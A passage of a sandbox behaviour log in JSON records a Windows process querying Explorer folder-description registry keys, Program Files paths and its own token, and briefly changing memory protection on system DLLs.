10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Icon" } ], "repeated": 0, "id": 485 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Security" } ], "repeated": 0, "id": 486 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResource" } ], "repeated": 0, "id": 487 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResourceType" } ], "repeated": 0, "id": 488 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalRedirectOnly" } ], "repeated": 0, "id": 489 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Roamable" } ], "repeated": 0, "id": 490 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "Data", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PreCreate" } ], "repeated": 0, "id": 491 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Stream" } ], "repeated": 0, "id": 492 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PublishExpandedPath" } ], "repeated": 0, "id": 493 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\DefinitionFlags" } ], "repeated": 0, "id": 494 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Attributes" }, { "name": "Data", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Attributes" } ], "repeated": 0, "id": 495 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\FolderTypeID" } ], "repeated": 0, "id": 496 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InitFolderHandler" } ], "repeated": 0, "id": 497 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e6000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 498 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e6000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 499 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000298" }, { "name": "SubKey", "value": "PropertyBag" }, { "name": "Handle", "value": "0x00000294" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PropertyBag" } ], "repeated": 0, "id": 500 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" } ], "repeated": 0, "id": 501 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion" }, { "name": "Handle", "value": "0x00000298" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion" } ], "repeated": 0, "id": 502 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "ProgramFilesDir (x86)" }, { "name": "Data", "value": "C:\\Program Files (x86)" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir (x86)" } ], "repeated": 0, "id": 503 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" } ], "repeated": 0, "id": 504 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 505 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2a56000" }, { "name": "ModuleName", "value": "SHELL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 506 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2a56000" }, { "name": "ModuleName", "value": "SHELL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 507 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000290" } ], "repeated": 0, "id": 508 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 509 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 510 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "Handle", "value": "0x00000298" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 511 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000298" }, { "name": "SubKey", "value": "{6D809377-6AF0-444B-8957-A3773F02200E}" }, { "name": "Handle", "value": "0x0000029c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444B-8957-A3773F02200E}" } ], "repeated": 0, "id": 512 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" } ], "repeated": 0, "id": 513 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "Category" }, { "name": "Data", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Category" } ], "repeated": 0, "id": 514 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "ProgramFilesX64" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Name" } ], "repeated": 0, "id": 515 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParentFolder" } ], "repeated": 0, "id": 516 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Description" } ], "repeated": 0, "id": 517 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\RelativePath" } ], "repeated": 0, "id": 518 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParsingName" } ], "repeated": 0, "id": 519 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InfoTip" } ], "repeated": 0, "id": 520 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalizedName" } ], "repeated": 0, "id": 521 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Icon" } ], "repeated": 0, "id": 522 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Security" } ], "repeated": 0, "id": 523 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResource" } ], "repeated": 0, "id": 524 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResourceType" } ], "repeated": 0, "id": 525 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalRedirectOnly" } ], "repeated": 0, "id": 526 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Roamable" } ], "repeated": 0, "id": 527 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PreCreate" } ], "repeated": 0, "id": 528 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Stream" } ], "repeated": 0, "id": 529 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PublishExpandedPath" } ], "repeated": 0, "id": 530 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\DefinitionFlags" } ], "repeated": 0, "id": 531 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "Attributes" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Attributes" } ], "repeated": 0, "id": 532 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\FolderTypeID" } ], "repeated": 0, "id": 533 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InitFolderHandler" } ], "repeated": 0, "id": 534 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000029c" }, { "name": "SubKey", "value": "PropertyBag" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PropertyBag" } ], "repeated": 0, "id": 535 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" } ], "repeated": 0, "id": 536 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion" }, { "name": "Handle", "value": "0x0000029c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion" } ], "repeated": 0, "id": 537 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "ProgramFilesDir" }, { "name": "Data", 